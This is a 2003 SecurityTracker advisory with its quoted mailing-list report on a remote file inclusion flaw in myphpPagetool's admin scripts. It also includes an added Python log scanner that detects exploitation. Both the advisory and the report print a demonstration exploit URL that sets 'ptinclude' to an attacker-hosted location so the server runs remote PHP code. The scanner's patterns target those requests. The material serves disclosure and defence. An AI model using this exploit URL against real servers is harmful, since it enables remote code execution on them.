SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   myphpPagetool
Vendors:   myphppagetool.sourceforge.net
myphpPagetool Include File Error Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006029
SecurityTracker URL:  http://securitytracker.com/id/1006029
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.4.3-1
Description:   An include file vulnerability was reported in myphpPagetool. A remote user can execute arbitrary shell commands on the target server.

Frog-m@n reported that several of the scripts include a file 'pt_config.inc' from a path built from the variable '$ptinclude'. If 'register_globals' is set to ON, a remote user can set this variable through the 'ptinclude' request parameter and specify a remote location for the 'pt_config.inc' file, causing the target server to execute the PHP code contained in that file. The PHP code may include operating system shell commands.

A demonstration exploit URL is provided:

http://[target]/doc/admin/index.php?ptinclude=http://[attacker]

In this demonstration exploit URL, the remote user's code in the file 'http://[attacker]/pt_config.inc' will be executed on the target server.

The affected files in /doc/admin/ include: index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php, and help9.php.
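
A defender's check for the request pattern described above, as an added example that is not part of the advisory or the vendor's code: it scans web server access log lines for requests to the ten affected scripts that supply 'ptinclude', and separates values naming a remote location from other values. The combined log format, the function names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts the advisory lists as affected, all under /doc/admin/.
AFFECTED = {"index.php"} | {f"help{n}.php" for n in range(1, 10)}
# Request line of a combined-format access log entry (format is an assumption).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Value naming a remote resource: scheme://... or protocol-relative //host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return 'remote-include', 'param-set' or None for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    head, _, script = unquote(target.path).rpartition("/")
    if script not in AFFECTED or not head.endswith("/doc/admin"):
        return None
    # parse_qs percent-decodes names and values, so encoded forms are seen too.
    values = parse_qs(target.query, keep_blank_values=True).get("ptinclude")
    if values is None:
        return None
    if any(REMOTE.match(v) for v in values):
        return "remote-include"
    # Assumption: the application never passes ptinclude in its own URLs,
    # so any request-supplied value is worth a review.
    return "param-set"

def scan(lines):
    """Yield (line_number, verdict, source_ip) for every flagged line."""
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            yield n, verdict, line.split(" ", 1)[0]

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE = [
    '192.0.2.10 - - [03/Feb/2003:10:00:01 +0000] "GET /doc/admin/index.php HTTP/1.0" 200 512',
    '198.51.100.7 - - [03/Feb/2003:10:00:05 +0000] "GET /doc/admin/index.php?ptinclude=http://host.example HTTP/1.0" 200 90',
    '198.51.100.7 - - [03/Feb/2003:10:00:09 +0000] "GET /doc/admin/help3.php?ptinclude=http%3A%2F%2Fhost.example HTTP/1.0" 200 90',
    '192.0.2.44 - - [03/Feb/2003:10:01:00 +0000] "GET /doc/admin/help9.php?ptinclude=/srv/site HTTP/1.0" 200 77',
    '192.0.2.44 - - [03/Feb/2003:10:01:02 +0000] "GET /other.php?ptinclude=http://host.example HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

An access log records only the query string, so this is a triage aid for affected installs and not a substitute for applying a patch.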

Impact:   A remote user can execute arbitrary shell commands on the target server. The commands would run with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry. The author of the report has developed an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  myphppagetool.sourceforge.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] myphpPagetool (php)



Information :
Version : 0.4.3-1
Website : http://myphppagetool.sourceforge.net/
Problem : Include file


PHP Code/Location :
In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, 
help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :

----------------------------------------
<?php
include ($ptinclude . "/pt_config.inc");
[...]
----------------------------------------




Exploit :
http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
with :
http://[attacker]/pt_config.inc

(if register_globals=ON)


Solution :
A patch has been published on http://www.phpsecure.info .


More details :
In French :
http://www.frog-man.org/tutos/myphpPagetool.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n

